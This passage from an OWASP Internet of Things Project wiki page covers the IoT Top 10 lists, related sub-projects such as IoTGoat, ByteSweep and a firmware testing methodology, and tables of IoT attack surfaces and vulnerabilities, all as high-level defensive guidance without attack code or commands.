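Each alert fires once per distinct condition, so a brute-force run yields one "high rate" alert rather than one per attempt. The device itself has to emit the `default_cred` flag, since nothing downstream can tell a factory password from any other successful login; that is the point of the Administrative Mode Events row.<br />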
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Security Logging Project provides a list of core events that should be logged by any IoT-related system. The project exists because IoT systems in general log far too few events to serve as input for a solid detection and response program, and for companies that want to build one there are few good resources describing what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>

Aaron.guzman https://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=255835 OWASP Internet of Things Project 2019-10-31T15:08:15Z <p>Aaron.guzman: .</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects separated into the following categories - Seek & Understand, Validate & Test, and Governance.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has been released![[File:OWASP 2018 IoT Top10 Final.jpg|center|thumb|1301x1301px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way to help Developers, Manufacturers, Enterprises, and Consumers make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf 2018 OWASP IoT Top 10].<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including: manufacturers, consulting, security testers, developers, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: [https://cloudsecurityalliance.org/artifacts/csa-iot-controls-matrix/ CSA IoT Controls Matrix], [https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf CTIA], [http://iot.stanford.edu/ Stanford’s Secure Internet of Things Project], [https://nvlpubs.nist.gov/nistpubs/ir/2018/NIST.IR.8200.pdf NISTIR 8200], [https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot/at_download/fullReport ENISA IoT Baseline Report], [https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/747413/Code_of_Practice_for_Consumer_IoT_Security_October_2018.pdf Code of Practice for Consumer IoT Security,] and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT, including embedded security, ICS/SCADA, etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants, whether you're a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the #iot-security room of the OWASP Slack Channel.<br />
<br />
'''''The OWASP IoT Security Team, 2018'''''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the [http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, adapt it, and use it commercially, provided that you attribute the work and that, if you alter, transform, or build upon it, you distribute the resulting work only under the same or a similar license.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
* IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
* Vishruta Rudresh<br />
* Aaron Guzman<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== IoT Top 2018 Contributors ==<br />
* Vijayamurugan Pushpanathan <br />
* Alexander Lafrenz <br />
* Masahiro Murashima <br />
* Charlie Worrell <br />
* José A. Rivas (jarv) <br />
* Pablo Endres <br />
* Ade Yoseman <br />
* Cédric Lévy-Bencheton<br />
* Jason Andress<br />
* Amélie Didion - Designer<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten 2014 PDF]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* OWASP [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoTGoat IoTGoat Project] underway<br />
* New firmware security analysis tool, ByteSweep<br />
* IoT ASVS and Testing Guide set to kick off in 2019<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak, Guessable, or Hardcoded Passwords<br />
* I2 Insecure Network Services<br />
* I3 Insecure Ecosystem Interfaces<br />
* I4 Lack of Secure Update Mechanism<br />
* I5 Use of Insecure or Outdated Components<br />
* I6 Insufficient Privacy Protection<br />
* I7 Insecure Data Transfer and Storage<br />
* I8 Lack of Device Management<br />
* I9 Insecure Default Settings<br />
* I10 Lack of Physical Hardening<br />
<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= OWASP IoT Top 10 2018 Mapping Project =<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Top 10 2018 Mapping Project ==<br />
<br />
The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical uses for the OWASP IoT Top 10. As with all Top 10 lists, it should be used as a first step and expanded upon according to the applicable IoT ecosystem.<br />
<br />
Mappings are structured with control categories, tests, or recommendations in the left column, descriptions in the middle column, and their mapping to the OWASP IoT Top 10 2018 list in the right column. Not every mapping is one-to-one; where it is not, similar recommendations and/or controls are listed. For items that are not applicable to the IoT Top 10 2018 list, "N/A" is given as the mapping.<br />
<br />
An example mapping of the IoT Top 10 2014 is provided below. <br />
<br />
[[File:2014 2018Mapping.png|center|frameless|746x746px]]<br />
<br />
For additional mappings, please visit the following link: https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Top 10 Mapping Project? ==<br />
<br />
The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical uses for the OWASP IoT Top 10. As with all Top 10 lists, it should be used as a first step and expanded upon according to the applicable IoT ecosystem.<br />
<br />
Mappings include the following:<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/owasp-iot-top-10-2014 OWASP IoT Top 10 2014]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/gsma-iot-security-assessment-checklist GSMA IoT Security Assessment Checklist]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/code-of-practice Code of Practice (UK Government)]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/enisa-baseline-security-recommendations-for-iot ENISA Baseline Security Recommendations for IoT]<br />
<br />
and more...<br />
<br />
== GitBook ==<br />
Mappings are hosted on GitBook using the following link https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
|}<br />
<br />
= IoTGoat =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoTGoat Project ==<br />
<br />
IoTGoat is a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the top 10 vulnerabilities as documented by OWASP: [[OWASP_Internet_of_Things_Project|OWASP Internet of Things Project]]. IoTGoat is expected to be released by December 2019.<br />
<br />
To get more information on getting started or how to contribute, visit the project's Github: https://github.com/scriptingxss/IoTGoat<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoTGoat Project? ==<br />
<br />
The IoTGoat Project is a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the IoT Top 10.<br />
<br />
== GitHub ==<br />
https://github.com/scriptingxss/IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
* Fotios Chantzis<br />
* [[User:Calderpwn|Paulino Calderon]]<br />
<br />
== Related Projects ==<br />
<br />
* WebGoat<br />
* Serverless Goat<br />
* NodeGoat<br />
* RailsGoat<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
[https://groups.google.com/forum/#!forum/iotgoat IoTGoat Google Group]<br />
<br />
== Quick Download ==<br />
* [https://docs.google.com/presentation/d/1SJfabCBxvC3GWnmBCqisO5pyLzkB1-EVcR7s8baT0dE/edit?usp=sharing Project Kick-off Slides]<br />
* [https://strozfriedberg.webex.com/recordingservice/sites/strozfriedberg/recording/playback/5529b228ac514bed8cc050a9dee0f0df Project Kick-off Meeting]<br />
* [https://docs.google.com/spreadsheets/d/1KXX2K7ikkve6wmdfAVu-sZONgKEBuAkRij_paJUgX2w/edit?usp=sharing Project Task List]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= ByteSweep =<br />
[[File:OWASP_Project_Header.jpg|link=]]<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== ByteSweep Project ==<br />
<br />
ByteSweep is a Free Software IoT firmware security analysis platform. It allows IoT device makers, large and small, to conduct fully automated security checks before they ship firmware.<br />
<br />
ByteSweep Features:<br />
* Firmware extraction<br />
* File data enrichment<br />
* Key and password hash identification<br />
* Unsafe function use detection<br />
* 3rd party component identification<br />
* CVE correlation<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the ByteSweep Project? ==<br />
<br />
A Free Software IoT Firmware Security Analysis Platform.<br />
<br />
== GitLab ==<br />
https://gitlab.com/bytesweep/bytesweep<br />
<br />
== Project Leaders ==<br />
<br />
* Matt Brown<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* https://gitlab.com/bytesweep/bytesweep/blob/master/INSTALL.md<br />
<br />
|}<br />
<br />
= Firmware Security Testing Methodology =<br />
[[File:OWASP_Project_Header.jpg|link=]]<br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Security Testing Methodology ==<br />
<br />
The Firmware Security Testing Methodology (FSTM) is composed of nine stages tailored to enable security researchers, software developers, consultants, hobbyists, and information security professionals to conduct firmware security assessments.<br />
<br />
{| class="wikitable"<br />
|'''Stage'''<br />
|'''Description'''<br />
|-<br />
|1. Information gathering and reconnaissance<br />
|Acquire all relevant technical and documentation details pertaining to the target device’s firmware<br />
|-<br />
|2. Obtaining firmware<br />
|Obtain firmware using one or more of the proposed methods listed<br />
|-<br />
|3. Analyzing firmware<br />
|Examine the target firmware’s characteristics<br />
|-<br />
|4. Extracting the filesystem<br />
|Carve filesystem contents from the target firmware<br />
|-<br />
|5. Analyzing filesystem contents<br />
|Statically analyze extracted filesystem configuration files and binaries for vulnerabilities <br />
|-<br />
|6. Emulating firmware<br />
|Emulate firmware files and components<br />
|-<br />
|7. Dynamic analysis<br />
|Perform dynamic security testing against firmware and application interfaces<br />
|-<br />
|8. Runtime analysis<br />
|Analyze compiled binaries during device runtime<br />
|-<br />
|9. Binary Exploitation<br />
|Exploit identified vulnerabilities discovered in previous stages to attain root and/or code execution<br />
|}<br />
<br />
The full methodology release can be downloaded via the following link: TBD.<br />
<br />
{{Social Media Links}} <br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Security Testing Methodology ==<br />
<br />
The Firmware Security Testing Methodology Project provides:<br />
<br />
*Attack walkthroughs<br />
*Tool usage examples<br />
*Screenshots<br />
*Companion virtual machine preloaded with tools (EmbedOS) - <nowiki>https://github.com/scriptingxss/EmbedOS</nowiki> <br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
<br />
== Quick Download ==<br />
* TBD<br />
<br />
|}<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Check for old software versions and known attacks against them (Heartbleed, Shellshock, old PHP versions, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of the same static encryption/decryption key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damage (Physically)<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to '1234' or '123456' for example.<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented, but it is improperly configured or not kept up to date, e.g. using SSL v2<br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* The service can be attacked in a way that denies service to that service or to the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
